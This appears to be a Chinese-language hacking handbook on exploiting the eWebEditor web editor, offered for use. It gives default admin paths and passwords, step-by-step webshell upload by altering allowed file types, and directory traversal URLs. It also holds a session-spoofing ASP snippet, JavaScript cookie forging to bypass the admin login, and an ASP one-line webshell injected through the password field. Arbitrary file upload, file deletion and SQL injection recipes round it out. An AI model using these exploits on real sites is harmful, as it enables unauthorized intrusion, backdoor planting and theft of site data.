eWebEditor网页编辑器漏洞手册

eWebEditor
eWebEditor利用基础知识
默认后台地址：/ewebeditor/admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问
默认数据库路径：[PATH]/db/ewebeditor.mdb
[PATH]/db/db.mdb--某些CMS里是这个数据库
也可尝试[PATH]/db/%23ewebeditor.mdb--某些管理员自作聪明的小伎俩

使用默认密码：admin/admin888或admin/admin进入后台，也可尝试admin/123456（有些管理员以及一些CMS，就是这么设置的）
点击“样式管理”--可以选择新增样式，或者修改一个非系统样式，将其中图片控件所允许的上传类型后面加上|asp、|asa、|aaspsp或|cer，只要是服务器允许执行的脚本类型即可，点击“提交”并设置工具栏--将“插入图片”控件添加上。而后--预览此样式，点击插入图片，上传WEBSHELL，在“代码”模式中查看上传文件的路径。
2、当数据库被管理员修改为asp、asa后缀的时候，可以插一句话木马服务端进入数据库，然后一句话木马客户端连接拿下webshell
3、上传后无法执行？目录没权限？帅锅你回去样式管理看你编辑过的那个样式，里面可以自定义上传路径的！！！
4、设置好了上传类型，依然上传不了麽？估计是文件代码被改了，可以尝试设定“远程类型”依照6.0版本拿SHELL的方法来做（详情见下文↓），能够设定自动保存远程文件的类型。
5、不能添加工具栏，但设定好了某样式中的文件类型，怎么办？↓这么办！
(请修改action字段)
Action.html

eWebEditor踩脚印式入侵
脆弱描述：
当我们下载数据库后查询不到密码MD5的明文时，可以去看看webeditor_style(14)这个样式表，看看是否有前辈入侵过或许已经赋予了某控件上传脚本的能力，构造地址来上传我们自己的WEBSHELL.
攻击利用:
比如ID=46s-name=standard1
构造代码:ewebeditor.asp?id=content&style=standard
ID和和样式名改过后
ewebeditor.asp?id=46&style=standard1
eWebEditor遍历目录漏洞
脆弱描述：
ewebeditor/admin_uploadfile.asp
admin/upload.asp
过滤不严，造成遍历目录漏洞
攻击利用:
第一种:ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加&dir=../..
&dir=http://www.heimian.com/../..看到整个网站文件了
第二种:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
eWebEditor5.2列目录漏洞
脆弱描述：
ewebeditor/asp/browse.asp
过滤不严，造成遍历目录漏洞
攻击利用：
http://www.heimian.com/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
利用WebEditorsession欺骗漏洞,进入后台
脆弱描述：
漏洞文件:Admin_Private.asp
只判断了session，没有判断cookies和路径的验证问题。
攻击利用:
新建一个test.asp内容如下:
<%Session("eWebEditor_User")="11111111"%>
访问test.asp，再访问后台任何文件，forexample:Admin_Default.asp
eWebEditorasp版2.1.6上传漏洞
攻击利用:（请修改action字段为指定网址）
ewebeditorasp版2.1.6上传漏洞利用程序.html

eWebEditor2.7.0注入漏洞
攻击利用:
http://www.heimian.com/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名：eWebEditor_System默认列名：sys_UserName、sys_UserPass，然后利用nbsi进行猜解.

eWebEditor2.8.0最终版删除任意文件漏洞
脆弱描述：
此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入。
攻击利用:(请修改action字段为指定网址)
DelFiles.html

eWebEditorv6.0.0上传漏洞
攻击利用:
在编辑器中点击“插入图片”--网络--输入你的WEBSHELL在某空间上的地址（注：文件名称必须为：xxx.jpg.asp以此类推…），确定后，点击“远程文件自动上传”控件（第一次上传会提示你安装控件，稍等即可），查看“代码”模式找到文件上传路径，访问即可，eweb官方的DEMO也可以这么做，不过对上传目录取消掉了执行权限，所以上传上去也无法执行网马.
eWebEditorPHP/ASP…后台通杀漏洞
影响版本:PHP≥3.0~3.8与asp2.8版也通用，或许低版本也可以，有待测试。
攻击利用:
进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了.
这时候你清空浏览器的url,然后输入
alert(document.cookie="adminuser="+escape("admin"));< /span>
alert(document.cookie="adminpass="+escape("admin"));< /span>
alert(document.cookie="admindj="+escape("1"));< /span>
而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php，就会直接进去。

eWebEditorforphp任意文件上传漏洞
影响版本:ewebeditorphpv3.8orolderversion
脆弱描述:
此版本将所有的风格配置信息保存为一个数组$aStyle,在php.ini配置register_global为on的情况下我们可以任意添加自己喜欢的风格，并定义上传类型。
攻击利用:
phpupload.html

eWebEditorJSP版漏洞
大同小异，我在本文档不想多说了，因为没环境测试，网上垃圾场那么大，不好排查。用JSP编辑器的我觉得eweb会比FCKeditor份额少得多。
给出个连接：http://blog.haaker.cn/post/161.html
还有：http://www.anqn.com/zhuru/article/all/2008-12-04/a09104236.shtml
eWebEditor2.8商业版插一句话木马
影响版本:=>2.8商业版
攻击利用:
登陆后台，点击修改密码---新密码设置为1":evalrequest("h")’
设置成功后，访问asp/config.asp文件即可，一句话木马被写入到这个文件里面了.

eWebEditorNetupload.aspx上传漏洞(WebEditorNet)
脆弱描述：
WebEditorNet主要是一个upload.aspx文件存在上传漏洞。
攻击利用:
默认上传地址：/ewebeditornet/upload.aspx
可以直接上传一个cer的木马
如果不能上传则在浏览器地址栏中输入lbtnUpload.click();< /span>
成功以后查看源代码找到uploadsave查看上传保存地址，默认传到uploadfile这个文件夹里。
southidceditor(一般使用v2.8.0版eWeb核心)
http://www.heimian.com/admin/southidceditor/datas/southidceditor.mdb
http://www.heimian.com/admin/southidceditor/admin/admin_login.asp
http://www.heimian.com/admin/southidceditor/popup.asp
bigcneditor(eWeb2.7.5VIP核心)
其实所谓的Bigcneditor就是eWebEditor2.7.5的VIP用户版.之所以无法访问admin_login.asp，提示“权限不够”4字真言，估计就是因为其授权“Licensed”问题,或许只允许被授权的机器访问后台才对。
或许上面针对eWebEditorv2.8以下低版本的小动作可以用到这上面来.貌似没多少动作?
--------------------------------------------------------------------------------